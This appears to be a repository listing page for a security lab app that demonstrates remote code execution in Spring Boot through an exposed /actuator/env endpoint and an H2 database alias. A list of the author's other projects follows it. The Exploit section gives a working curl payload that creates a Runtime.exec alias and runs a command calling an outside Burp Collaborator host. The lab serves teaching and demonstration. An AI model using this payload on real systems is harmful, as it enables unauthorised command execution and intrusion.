spaceraccoon/spring-boot-actuator-h2-rce

Stars
102
Rank 333,608 (Top 7 %)
Language
Java
Created over 4 years ago
Updated over 4 years ago

spaceraccoon/spring-boot-actuator-h2-rce

spaceraccoon

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Sample Spring Boot App Demonstrating RCE via Exposed env Actuator and H2 Database

Spring Boot Actuator H2 RCE

Introduction

Writeup: Remote Code Execution in Three Acts: Chaining Exposed Actuators and H2 Database Aliases in Spring Boot 2

This is a sample app based off the default Spring Boot app in Spring's documentation that demonstrates how an attacker can achieve RCE on an instance with an exposed /actuator/env endpoint and a H2 database.

Usage

First, start the app. You can do this locally or with Docker.

Local

If you run this locally, you need JDK 1.8 or later and Maven 3.2+.

./mvnw package && java -jar target/gs-spring-boot-docker-0.1.0.jar

Docker

sudo docker build -t spaceraccoon/spring-boot-rce-lab .
sudo docker run -p 8080:8080 -t spaceraccoon/spring-boot-rce-lab

The app is now running on localhost:8080.

Exploit

(Modify the curl request accordingly) curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"name\":\"spring.datasource.hikari.connection-test-query\",\"value\":\"CREATE ALIAS EXEC AS CONCAT(\'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new\',\' java.util.Scanner(Runtime.getRun\',\'time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }\');CALL EXEC(\'curl http://x.burpcollaborator.net\');\"}' 'http://localhost:8080/actuator/env'
curl -X 'POST' -H 'Content-Type: application/json' 'http://localhost:8080/actuator/restart'

You will receive a pingback.

manuka

A modular OSINT honeypot for blue teamers

webpack-exploder

Unpack the source code of React and other Webpacked apps!

CVE-2020-10665

POC for CVE-2020-10665 Docker Desktop Local Privilege Escalation

npm-scan

An extensible, heuristic-based vulnerability scanning tool for installed npm packages

npm-zoo

A zoo for malicious NPM packages

accent-trainer

Flask webapp/endpoint that compares the user's speech with different accents and assigns similarity scores based on speed, voice (DTW/MFCC), and accuracy. The accents are generated from Amazon Polly and accuracy analysis using Bing Speech API speech to text.

icalendardb

serverless-recon-example

Example of a serverless web reconaissance workflow's AWS architecture.

detect-cve-2024-4367

YARA detection rule for CVE-2024-4367 arbitrary javascript execution in PDF.js

lohrem-ipsum

A Singlish version of the classic Lorem Ipsum generator coded as a Racket webapp.

aws-amazon-polly-flask-sample

Amazon Polly implementation that mirrors the Python example provided by AWS, only using the Flask framework.

streamliner-doc-word-replacer

Flask webapp that replaces words in documents according to debate tournament rules. Useful if you want to quickly replace a dictionary of words and save syllables.

road-sign-manager

A civic hacking project in collaboration with MakeHaven and New Haven Transportation. A cloud road sign manager platform.

manuka-client

Frontend client for Manuka

unicollider

An elegant frontend to generate and detect possible Unicode transformation collisions.

npm-scan-backtest

Backtest npm-scan on past updates on npmjs

Challendar-TISC-2022-Challenge-7

code4good-crash-course

A developer crash course for my team at Code4Good.

manuka-listener

Listener honeypot for Manuka

manuka-server

REST API and business logic for Manuka

electronic-road-sign-simulator

Express app that simulates an electronic road sign that is updated over the web live via websockets.

jobcan-automatic-clock-chrome-extension

Chrome extension for automatic clocking on JobCan (Unofficial)

SSRFTest

SSRF testing tool